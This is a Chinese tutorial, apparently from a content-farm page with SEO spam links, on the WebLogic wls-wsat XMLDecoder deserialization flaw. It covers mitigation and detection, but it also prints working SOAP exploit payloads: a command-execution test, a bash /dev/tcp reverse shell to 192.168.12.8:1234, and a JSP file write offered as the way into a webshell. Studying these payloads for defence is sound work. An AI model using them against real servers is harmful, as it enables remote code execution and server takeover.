当前位置: 首页 > wzjs >正文

免费素材网站pexels网络广告营销方案策划

免费素材网站pexels,网络广告营销方案策划,做百度文库需要网站吗,购买网站Weblogic < 10.3.6 wls-wsat XMLDecoder 反序列化漏洞 漏洞原理: 反序列化机制: weblogic sercer使用的是java的XMLDecoder类来解析和范系列化xml数据 xml Decoder是一个强大的工具,可以将xml数据转换为java对象,然而如果反序列化的数据不受信任,可能导致安全问题 漏洞触发点…
Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞
  • 漏洞原理:
反序列化机制: weblogic sercer使用的是java的XMLDecoder类来解析和范系列化xml数据
xml Decoder是一个强大的工具,可以将xml数据转换为java对象,然而如果反序列化的数据不受信任,可能导致安全问题
  • 漏洞触发点
weblogic server的wls-wsat组件提供了一个web服务点(/wls-wsat/CoordiatorPortType),用于处理SOAP请求
(SOAP是一种基于XML的协议),定义了如何在网络上传输信息 它是基于XML,因此消息是文本格式,易于阅读和调试 SOAP通常于http、HTTPS等协议结合使用,但是也能于SMTP等其他的协议一起使用
一个典型的SOAP请求包括以下部分:
  1. Envelope(信封) 根元素,标识这是一个SOAP信息,包含了Header和BOdy
  2. Header(头部) 可选部分,用于传递附加的信息(如认真信息,事物ID等)
  3. Body(主体) 必需部分,包含实际的数据请求
SOAP响应的结构:包含Envelope、Header和Body
该端点使用了XMLDecoder来处理传入的XML数据
  • 恶意XML构造
<java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>touch /tmp/pwned</string></void></array><void method="start"/></object>
</java>#该XML文件会通过XMLDecoder反序列化为一个ProcessBuilder对象,并且执行系统命令例如:touch /tmp/pwned
  • 漏洞利用过程:
  1. 攻击者构造恶意的XML文件,嵌入到http的请求中
  2. 将恶意的XML文件作为SOAP请求发送到weblogic Server的wls-wsat端点
  3. Weblogic Server使用XMl Decoder反序列化恶意的XML文件
  4. 反序列化过程中,恶意代码被执行,导致远程代码执行
如下所示:
我们需要使用bp抓取数据包,然后构造恶意的XML文件即可!
我们需要将conten-type修改成text/xml
测试的poc为:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.12.8/1234 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>#这里使用dev/tcp;反弹shell 192.168.12.8/1234端口
#我们只需要用kali监听1234端口即可
还给到了写入文件的poc
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[
<% out.print("test"); %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>  #写入了test的内容,我们也可以写入websehl
  • 漏洞影响:
  1. 远代码执行
攻击者哉目标的服务器上执行任意的命令,完全控制服务器
  1. 数据泄露
攻击者可以读取服务器上的敏感数据
  1. 服务器被接管
攻击者可以植入后门,创建新的用户或者删除数据
  • 修复建议:
  1. 打补丁 官方补丁
  2. 禁用wls-wsat组建,删除或者重命名wsl-wsat.war 和wls-wsat-coordination.war
  3. 限制访问,使用防火墙或者安全组限制对weblogic server端口的访问
  4. 检查weblogic server 的日子发现可以的soap请求
  • 漏洞检测
  1. 手动检测:
检查weblogic server版本是否存在响应范围内
  1. 工具检测:
使用漏洞扫描工具扫(nessus nmap等)
  1. Poc验证:
使用公开的poc脚本验证是否存在
http://www.dtcms.com/wzjs/104759.html

相关文章:

  • 网站分页代码洛阳网站建设
  • 产品网站怎么做的营销型网站建设总结
  • 景区网站怎么做的手机seo排名软件
  • 南阳做网站费用广东seo网络培训
  • 做外贸找产品上哪个网站好媒体发稿网
  • 网站客户端制作多少钱商务软文写作300字
  • 做门户网站难吗网店运营在哪里学比较好些
  • 性用品微商做的最好的网站北京seo相关
  • 苏州网站建设有限公司认识网络营销
  • 深圳的设计企业网站百度用户服务中心客服电话
  • 平邑县建设局网站电商平台推广方式有哪些
  • 网站可以做系统还原吗郑州网站顾问
  • wordpress 社交网站sem和seo是什么
  • 中山网站上排名百度招聘官网
  • 东莞物流网站建设大数据智能营销系统
  • 手机端网页界面设计福州seo公司
  • 不干净的网站做性东莞网站建设优化诊断
  • 深圳住房保障和建设局官网安徽seo报价
  • 外贸综合服务网站建设室内设计培训班学费一般多少
  • 做便民工具网站互联网营销师题库
  • 广州网站建设系统关键词提取工具app
  • 电商网站怎么做与众不同优化方案英语
  • 可登录的网站有哪些今天发生的重大新闻内容
  • 上海怎样建设网站宁波seo快速优化课程
  • 孝昌网站建设seo诊断工具网站
  • 设计服务网络建设方案抖音seo排名软件哪个好
  • 劫持网站代做排名河北seo网络优化师
  • 怎么制作图片视频和配音乐西安快速排名优化
  • 找网站建设沧州百度推广总代理
  • 国家住房和城乡建设部网站吧长沙网站优化效果